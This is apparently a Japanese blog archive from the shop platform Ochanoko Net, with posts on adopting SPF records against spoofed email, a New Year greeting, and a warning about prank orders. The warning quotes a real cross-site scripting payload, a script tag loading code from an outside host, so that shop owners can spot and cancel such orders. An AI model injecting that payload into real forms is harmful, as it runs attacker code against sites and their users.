カテゴリー別アーカイブ: おちゃのこネット

SPFレコードの導入について

1月もあっというまに過ぎ去り、既に月末となりました。
全国的にインフルエンザが猛威を振るっておりますが、皆様は大丈夫でしょうか?

本日(1/31)おちゃのこネットの最新情報で、
【予告】SPFレコード設定のお知らせ」について告知いたしました。

今回、設定するSPFレコードについてですが、なりすましメールを防止する仕組みとなります。
このメールアドレスは、このサーバからしか送信しませんということを宣言する仕組みです。
それ以外のサーバから送られる物は、なりすましメールとして受取側で判断してくださいということが可能となります。


引用:https://www.ipa.go.jp/security/topics/20120523_spf.html

図1の場合が、受信者側がSPFレコードを確認し、安心してメールを受け取れることになります。
図2の場合が、受信者側が送られてきたメールが、SPFレコードの範囲にないと確認して、なりすましメールと判定しています。

おちゃのこネットでは、2月14日よりSPFレコードを全アカウントにおいて導入予定です。
適用して欲しくないという方には、下記FAQを参考にして無効化することも可能です。
こちらもあわせてご確認ください。
http://www.ocnk.net/faq/index.php?action=artikel&cat=281595&id=1156

ネットショップにとって、メールは正しく届いて欲しい手段です。
なりすましメールを排除して、確実に届く環境を構築したいところですね。

新年あけましておめでとうございます

新年あけましておめでとうございます。
本年もどうぞよろしくお願いいたします。

おちゃのこネットは本日(5日)から仕事始めです。
本年も皆様のネットショップ運営にお役立ちできるよう、精進して参ります。

休暇中にいただきましたお問い合わせについては、随時回答しております。
本日中には回答いたしますので、お待ちいただけますようにお願いいたします。

本年もどうぞよろしくお願いいたします。

[注意喚起]いたずら注文について

今年もあとわずか、あっという間に師走の日々が過ぎていっています。
無事に年を越せるでしょうか?年内ももう一息頑張りましょう

さて、最近ショップにサーバ攻撃を目的とした、いたずら注文が発生しているそうです。
具体的には、お名前や住所欄に

"><script src=//xxe.la/9u></script>

上記が混在している注文については、ほぼいたずら注文と考えていただいて大丈夫です。
念のため、内容をご確認の上、キャンセル処理等をお願いします。

入力欄にスクリプトを入れることで、サーバの脆弱性を狙った攻撃となりますが。
おちゃのこネットでは上記の対策をおこなっておりますので、攻撃そのものを受け付けません。
ご安心ください。

年末商戦頑張って、良い年を迎えられるように頑張りましょう!